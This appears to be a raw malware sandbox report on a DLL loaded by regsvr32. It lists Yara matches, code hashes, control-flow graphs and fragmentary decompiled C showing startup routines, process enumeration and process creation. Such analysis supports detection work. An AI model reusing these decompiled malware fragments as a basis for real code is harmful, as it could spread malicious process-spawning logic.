                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: /Q$;$F8$KT$F$Z
                                                                                                                                                                                                                    • API String ID: 0-1951868783
                                                                                                                                                                                                                    • Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                                                                                                                                    • Instruction ID: 576d61c81d855c800d11e166980420480df924f155ce4623c97498c799430fa9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C06147B0E147098FCB48DFA8D48A4DEBBB1FB58314F10821DE846A7290D7749995CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                    			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                                                                                                                                    				long long _v32;
                                                                                                                                                                                                                    				long long _v40;
                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                    				long long _t19;
                                                                                                                                                                                                                    				long long _t20;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_a24 = _t20;
                                                                                                                                                                                                                    				_a16 = _t15;
                                                                                                                                                                                                                    				_a8 = _t19;
                                                                                                                                                                                                                    				_v56 = _a16;
                                                                                                                                                                                                                    				if (_v56 == 1) goto 0x80010ae6;
                                                                                                                                                                                                                    				goto 0x80010bf4;
                                                                                                                                                                                                                    				 *0x80022ca0 = _a8;
                                                                                                                                                                                                                    				_v52 = 0x904;
                                                                                                                                                                                                                    				_v48 = 0xf9e;
                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                    				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
                                                                                                                                                                                                                    				ExitProcess(??);
                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                    0x180010ac0
                                                                                                                                                                                                                    0x180010ac5
                                                                                                                                                                                                                    0x180010ac9
                                                                                                                                                                                                                    0x180010ad6
                                                                                                                                                                                                                    0x180010adf
                                                                                                                                                                                                                    0x180010ae1
                                                                                                                                                                                                                    0x180010aeb
                                                                                                                                                                                                                    0x180010af2
                                                                                                                                                                                                                    0x180010afa
                                                                                                                                                                                                                    0x180010b02
                                                                                                                                                                                                                    0x180010b0b
                                                                                                                                                                                                                    0x180010b1b
                                                                                                                                                                                                                    0x180010b22

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                    • Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                                                                                                                                    • Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 353 69cc14-69cc36 354 69cc40 353->354 355 69cc42-69cc48 354->355 356 69cfbb-69d136 call 6b826c call 691718 355->356 357 69cc4e-69cc54 355->357 370 69d138 356->370 371 69d13d-69d314 call 691718 call 6b1ac4 356->371 359 69cc5a-69cc60 357->359 360 69cfb1-69cfb6 357->360 361 69d31f-69d325 359->361 362 69cc66-69cc73 359->362 360->355 361->355 367 69d32b-69d338 361->367 365 69ccb0-69cccb 362->365 366 69cc75-69ccae 362->366 369 69ccd5-69cf8f call 698870 call 691718 call 6b1ac4 365->369 366->369 383 69cf94-69cf9c 369->383 370->371 371->354 381 69d31a 371->381 381->361 383->367 384 69cfa2-69cfac 383->384
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 0c$\$c2&
                                                                                                                                                                                                                    • API String ID: 0-1001447681
                                                                                                                                                                                                                    • Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                                                                                                                                    • Instruction ID: df9611ba0fb41b7ea6752202aeac4abd19481763902c87954e1780a9b867f11d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B02E6715083C88BDBBECF64C889ADE7BADFB44708F10521DEA4A9E298DB745744CB41
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 385 698bc8-698c26 call 6a9f38 388 698c2b-698c30 385->388 389 698e8a-698e9a call 692c08 388->389 390 698c36-698c3b 388->390 397 698e9c-698ea1 389->397 398 698ea6 389->398 392 698e7b-698e85 390->392 393 698c41-698c43 390->393 392->388 395 698c49-698c4e 393->395 396 698eb8-698f90 call 6ac2c0 393->396 399 698d71-698e5f call 6a52c0 395->399 400 698c54-698c59 395->400 406 698f95-698fad 396->406 397->388 405 698ea8-698ead 398->405 407 698e64-698e6b 399->407 403 698c5f-698c64 400->403 404 698d10-698d6a call 6a8d60 400->404 403->405 408 698c6a-698cfb call 6abf94 403->408 411 698d6f Process32FirstW 404->411 405->406 409 698eb3 405->409 407->406 412 698e71-698e76 407->412 414 698d00-698d0b 408->414 409->388 411->399 412->388 414->388
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .f$M$N5
                                                                                                                                                                                                                    • API String ID: 0-1477915503
                                                                                                                                                                                                                    • Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                                                                                                                                    • Instruction ID: 43cf20e1159e4f9c1e7887ea1205c13ca53e00b5e2ae15febf683cf712aa25d7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6A160705197449FDBE8DF28C4C959EBBE1FB84304F906A1DF8869B2A0CB78D945CB42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 459 6a8fc8-6a8ff9 call 6a9f38 462 6a9000 459->462 463 6a9005-6a900b 462->463 464 6a9011-6a9017 463->464 465 6a9354-6a93f0 call 6a464c 463->465 467 6a901d-6a9023 464->467 468 6a9134-6a9235 call 6aeac0 call 6b1684 464->468 476 6a93f5 465->476 469 6a912a-6a912f 467->469 470 6a9029-6a902b 467->470 481 6a923a-6a934f call 6987dc 468->481 469->463 473 6a93fa-6a9400 470->473 474 6a9031-6a9125 call 6a49b0 470->474 473->463 477 6a9406-6a9421 473->477 474->462 476->473 481->476
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: A]jN
                                                                                                                                                                                                                    • API String ID: 0-1761522205
                                                                                                                                                                                                                    • Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                                                                                                                                    • Instruction ID: a1d0eaf7692b7efbd39b1ef2b4029c84b2c7bd78e08164704a7ce6915681cf43
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BD1E5B1E0060A8FDF48DFA8C48A4AEBBB1FB54304F20462DD556BB290D7785A46CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: C
                                                                                                                                                                                                                    • API String ID: 0-3705061908
                                                                                                                                                                                                                    • Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                                                                                                                                    • Instruction ID: e184a41a260784daf180f10b92ff2420a5be9277b628e48cf3d36bbb288b1ad5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE61CF7151C7848BD768DF28C18A40FBBF1FBD6748F100A1DF69A862A0D7B6D958CB42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 134 18000147c-180001482 135 180001484-180001487 134->135 136 1800014bd-1800014c7 134->136 137 1800014b1-1800014f0 call 180001268 135->137 138 180001489-18000148c 135->138 139 1800015e4-1800015f9 136->139 157 1800014f6-18000150b call 1800010fc 137->157 158 1800015be 137->158 140 1800014a4 __scrt_dllmain_crt_thread_attach 138->140 141 18000148e-180001491 138->141 142 180001608-180001622 call 1800010fc 139->142 143 1800015fb 139->143 149 1800014a9-1800014b0 140->149 145 180001493-18000149c 141->145 146 18000149d-1800014a2 call 1800011ac 141->146 155 180001624-180001659 call 180001224 call 180001e54 call 180001ed0 call 1800013d8 call 1800013fc call 180001254 142->155 156 18000165b-18000168c call 180001c48 142->156 147 1800015fd-180001607 143->147 146->149 155->147 168 18000169d-1800016a3 156->168 169 18000168e-180001694 156->169 166 180001511-180001522 call 18000116c 157->166 167 1800015d6-1800015e3 call 180001c48 157->167 162 1800015c0-1800015d5 158->162 184 180001573-18000157d call 1800013d8 166->184 185 180001524-180001548 call 180001e94 call 180001e44 call 180001e70 call 180006da0 166->185 167->139 174 1800016a5-1800016af 168->174 175 1800016ea-1800016f2 call 180010ac0 168->175 169->168 173 180001696-180001698 169->173 180 18000178b-180001798 173->180 181 1800016b1-1800016b9 174->181 182 1800016bb-1800016c9 174->182 186 1800016f7-180001700 175->186 187 1800016cf-1800016d7 call 18000147c 181->187 182->187 198 180001781-180001789 182->198 184->158 206 18000157f-18000158b call 180001e8c 184->206 185->184 234 18000154a-180001551 __scrt_dllmain_after_initialize_c 185->234 194 180001702-180001704 186->194 195 180001738-18000173a 186->195 200 1800016dc-1800016e4 187->200 194->195 203 180001706-180001728 call 180010ac0 call 1800015e4 194->203 196 180001741-180001756 call 18000147c 195->196 197 18000173c-18000173f 195->197 196->198 215 180001758-180001762 196->215 197->196 197->198 198->180 200->175 200->198 203->195 229 18000172a-18000172f 203->229 223 1800015b1-1800015bc 206->223 224 18000158d-180001597 call 180001340 206->224 220 180001764-18000176b 215->220 221 18000176d-18000177d 215->221 220->198 221->198 223->162 224->223 233 180001599-1800015a7 224->233 229->195 233->223 234->184 235 180001553-180001570 call 180006d5c 234->235 235->184
                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E0000000118000147C(void* __edx) {
                                                                                                                                                                                                                    				void* _t5;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t5 = __edx;
                                                                                                                                                                                                                    				if (_t5 == 0) goto 0x800014bd;
                                                                                                                                                                                                                    				if (_t5 == 0) goto 0x800014b1;
                                                                                                                                                                                                                    				if (_t5 == 0) goto 0x800014a4;
                                                                                                                                                                                                                    				if (__edx == 1) goto 0x8000149d;
                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                    0x180001480
                                                                                                                                                                                                                    0x180001482
                                                                                                                                                                                                                    0x180001487
                                                                                                                                                                                                                    0x18000148c
                                                                                                                                                                                                                    0x180001491
                                                                                                                                                                                                                    0x18000149c

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 190073905-0
                                                                                                                                                                                                                    • Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                                                                                                                                    • Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                    			E000000011800063CC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                                                                                                                                                                                                                    				long long _v56;
                                                                                                                                                                                                                    				void* __rdi;
                                                                                                                                                                                                                    				void* __rsi;
                                                                                                                                                                                                                    				void* __rbp;
                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                                    				long long _t73;
                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                    				long long _t89;
                                                                                                                                                                                                                    				signed int _t90;
                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                    				intOrPtr* _t92;
                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t98 = __r8;
                                                                                                                                                                                                                    				_t75 = __rcx;
                                                                                                                                                                                                                    				_a8 = __rbx;
                                                                                                                                                                                                                    				r14d = __ecx;
                                                                                                                                                                                                                    				if (__ecx == 0) goto 0x8000653f;
                                                                                                                                                                                                                    				_t2 = _t75 - 1; // -1
                                                                                                                                                                                                                    				if (_t2 - 1 <= 0) goto 0x8000640a;
                                                                                                                                                                                                                    				E000000011800086F4(_t2 - 1, __rax);
                                                                                                                                                                                                                    				_t3 = _t90 + 0x16; // 0x16
                                                                                                                                                                                                                    				 *__rax = _t3;
                                                                                                                                                                                                                    				E000000011800085B8();
                                                                                                                                                                                                                    				goto 0x8000653f;
                                                                                                                                                                                                                    				E00000001180009CD8(_t50, __rbx, _t91);
                                                                                                                                                                                                                    				r8d = 0x104;
                                                                                                                                                                                                                    				E000000011800093BC(_t50, 0x80022250, _t75, 0x80022250, _t90, _t91, _t98);
                                                                                                                                                                                                                    				_t92 =  *0x80022630; // 0x743350
                                                                                                                                                                                                                    				 *0x80022610 = 0x80022250;
                                                                                                                                                                                                                    				if (_t92 == 0) goto 0x8000643e;
                                                                                                                                                                                                                    				if ( *_t92 != dil) goto 0x80006441;
                                                                                                                                                                                                                    				_t67 =  &_a32;
                                                                                                                                                                                                                    				_a24 = _t90;
                                                                                                                                                                                                                    				_v56 = _t67;
                                                                                                                                                                                                                    				r8d = 0;
                                                                                                                                                                                                                    				_a32 = _t90;
                                                                                                                                                                                                                    				_t31 = E000000011800061A4(0x80022250, 0x80022250, 0x80022250, 0x80022250, _t95, _t98,  &_a24);
                                                                                                                                                                                                                    				r8d = 1;
                                                                                                                                                                                                                    				E0000000118000636C(_t31, _a24, _a32, _t98); // executed
                                                                                                                                                                                                                    				_t73 = _t67;
                                                                                                                                                                                                                    				if (_t67 != 0) goto 0x80006499;
                                                                                                                                                                                                                    				E000000011800086F4(_t67, _t67);
                                                                                                                                                                                                                    				 *_t67 = 0xc;
                                                                                                                                                                                                                    				E0000000118000878C(_t67, _a24);
                                                                                                                                                                                                                    				goto 0x80006403;
                                                                                                                                                                                                                    				_v56 =  &_a32;
                                                                                                                                                                                                                    				E000000011800061A4(_t73, 0x80022250, _t73, 0x80022250, _t95, _t67 + _a24 * 8,  &_a24);
                                                                                                                                                                                                                    				if (r14d != 1) goto 0x800064d1;
                                                                                                                                                                                                                    				_t37 = _a24 - 1;
                                                                                                                                                                                                                    				 *0x80022620 = _t73;
                                                                                                                                                                                                                    				 *0x80022618 = _t37;
                                                                                                                                                                                                                    				goto 0x8000653a;
                                                                                                                                                                                                                    				_a16 = _t90;
                                                                                                                                                                                                                    				0x80009298();
                                                                                                                                                                                                                    				if (_t37 == 0) goto 0x80006500;
                                                                                                                                                                                                                    				E0000000118000878C( &_a32, _a16);
                                                                                                                                                                                                                    				_a16 = _t90;
                                                                                                                                                                                                                    				E0000000118000878C( &_a32, _t73);
                                                                                                                                                                                                                    				goto 0x8000653f;
                                                                                                                                                                                                                    				_t89 = _a16;
                                                                                                                                                                                                                    				if ( *_t89 == _t90) goto 0x8000651b;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t89 + 8)) != _t90) goto 0x8000650f;
                                                                                                                                                                                                                    				 *0x80022618 = 0;
                                                                                                                                                                                                                    				_a16 = _t90;
                                                                                                                                                                                                                    				 *0x80022620 = _t89;
                                                                                                                                                                                                                    				E0000000118000878C(_t89 + 8, _t90 + 1);
                                                                                                                                                                                                                    				_a16 = _t90;
                                                                                                                                                                                                                    				E0000000118000878C(_t89 + 8, _t73);
                                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                    0x1800063cc
                                                                                                                                                                                                                    0x1800063cc
                                                                                                                                                                                                                    0x1800063cc
                                                                                                                                                                                                                    0x1800063e1
                                                                                                                                                                                                                    0x1800063e6
                                                                                                                                                                                                                    0x1800063ec
                                                                                                                                                                                                                    0x1800063f2
                                                                                                                                                                                                                    0x1800063f4
                                                                                                                                                                                                                    0x1800063f9
                                                                                                                                                                                                                    0x1800063fc
                                                                                                                                                                                                                    0x1800063fe
                                                                                                                                                                                                                    0x180006405
                                                                                                                                                                                                                    0x18000640a
                                                                                                                                                                                                                    0x180006416
                                                                                                                                                                                                                    0x180006421
                                                                                                                                                                                                                    0x180006426
                                                                                                                                                                                                                    0x18000642d
                                                                                                                                                                                                                    0x180006437
                                                                                                                                                                                                                    0x18000643c
                                                                                                                                                                                                                    0x180006441
                                                                                                                                                                                                                    0x180006445
                                                                                                                                                                                                                    0x18000644d
                                                                                                                                                                                                                    0x180006452
                                                                                                                                                                                                                    0x180006455
                                                                                                                                                                                                                    0x18000645e
                                                                                                                                                                                                                    0x180006467
                                                                                                                                                                                                                    0x180006474
                                                                                                                                                                                                                    0x180006479
                                                                                                                                                                                                                    0x18000647f
                                                                                                                                                                                                                    0x180006481
                                                                                                                                                                                                                    0x18000648d
                                                                                                                                                                                                                    0x18000648f
                                                                                                                                                                                                                    0x180006494
                                                                                                                                                                                                                    0x1800064ab
                                                                                                                                                                                                                    0x1800064b0
                                                                                                                                                                                                                    0x1800064b9
                                                                                                                                                                                                                    0x1800064be
                                                                                                                                                                                                                    0x1800064c0
                                                                                                                                                                                                                    0x1800064c7
                                                                                                                                                                                                                    0x1800064cf
                                                                                                                                                                                                                    0x1800064d5
                                                                                                                                                                                                                    0x1800064dc
                                                                                                                                                                                                                    0x1800064e5
                                                                                                                                                                                                                    0x1800064eb
                                                                                                                                                                                                                    0x1800064f3
                                                                                                                                                                                                                    0x1800064f7
                                                                                                                                                                                                                    0x1800064fe
                                                                                                                                                                                                                    0x180006500
                                                                                                                                                                                                                    0x18000650d
                                                                                                                                                                                                                    0x180006519
                                                                                                                                                                                                                    0x18000651b
                                                                                                                                                                                                                    0x180006523
                                                                                                                                                                                                                    0x180006527
                                                                                                                                                                                                                    0x18000652e
                                                                                                                                                                                                                    0x180006536
                                                                                                                                                                                                                    0x18000653a
                                                                                                                                                                                                                    0x180006551

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00000001800063FE
                                                                                                                                                                                                                      • Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
                                                                                                                                                                                                                      • Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: C:\Windows\system32\regsvr32.exe$P3t
                                                                                                                                                                                                                    • API String ID: 2724796048-886724411
                                                                                                                                                                                                                    • Opcode ID: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                                                                                                                                    • Instruction ID: 22eee0821ddd0031139ae0324638ff7f0a91ab2d69636e8f5a4f0751baae73e2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4418B36601B1896FB97DF65A8403EC3795FB4CBC4F588025FE4A43BAADE34C6898340
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 415 6a3988-6a3a3e call 6a9f38 418 6a3acc-6a3b12 CreateProcessW 415->418 419 6a3a44-6a3ac6 call 69a940 415->419 419->418
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                                                    • String ID: li
                                                                                                                                                                                                                    • API String ID: 963392458-3170889640
                                                                                                                                                                                                                    • Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                                                                                                                                    • Instruction ID: 85d873c2ea6169da65e061248421a9cd82f162fca4c9dac3bea3db5ce393a269
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD41E67091CB848FDBA4DF18D0C97DAB7E0FB98315F20495DE488C7296CB789884CB86
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 422 18000d26c-18000d289 423 18000d2b4-18000d2c1 call 180008160 422->423 424 18000d28b-18000d29c call 1800086f4 call 1800085b8 422->424 430 18000d2c7-18000d2ce 423->430 435 18000d29e-18000d2b3 424->435 432 18000d306-18000d312 call 1800081b4 430->432 433 18000d2d0-18000d2db 430->433 432->435 436 18000d2dd 433->436 437 18000d2df call 18000d174 433->437 439 18000d301-18000d304 436->439 441 18000d2e4-18000d2eb 437->441 439->430 442 18000d2f2-18000d2fb 441->442 443 18000d2ed-18000d2f0 441->443 442->439 443->432
                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_a8 = __rbx;
                                                                                                                                                                                                                    				_a16 = __rsi;
                                                                                                                                                                                                                    				_a24 = __rdi;
                                                                                                                                                                                                                    				if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
